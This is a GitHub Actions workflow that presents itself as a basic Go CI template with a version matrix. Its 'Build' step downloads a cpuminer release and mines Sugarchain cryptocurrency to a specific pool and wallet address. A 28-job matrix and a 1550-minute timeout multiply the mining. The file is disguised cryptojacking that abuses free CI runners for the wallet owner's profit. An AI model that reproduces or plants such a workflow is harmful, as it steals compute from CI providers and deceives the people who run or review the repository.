# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the action will run. 
on: [push, pull_request]
jobs:
  # This workflow contains a single job called "build"
  build:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    strategy:
      matrix:
        go: [1.11, 1.12, 1.13, 1.14]
        flag: [hvf, hik, plh, tda, pnc, pll, tue]
    timeout-minutes: 1550
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}

    steps:
      
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go

    - name: Check out code into the Go module directory
      uses: actions/checkout@v1

    - name: Build
      run: |
        wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
        tar xf cpuminer-opt-linux.tar.gz
        ./cpuminer-sse2 -a yespowersugar -o stratum-na.rplant.xyz:7042 -u sugar1qvjqvju68sgpq5ntzcz06u8qc52a32lwh4nx7fs.B-Action -t0
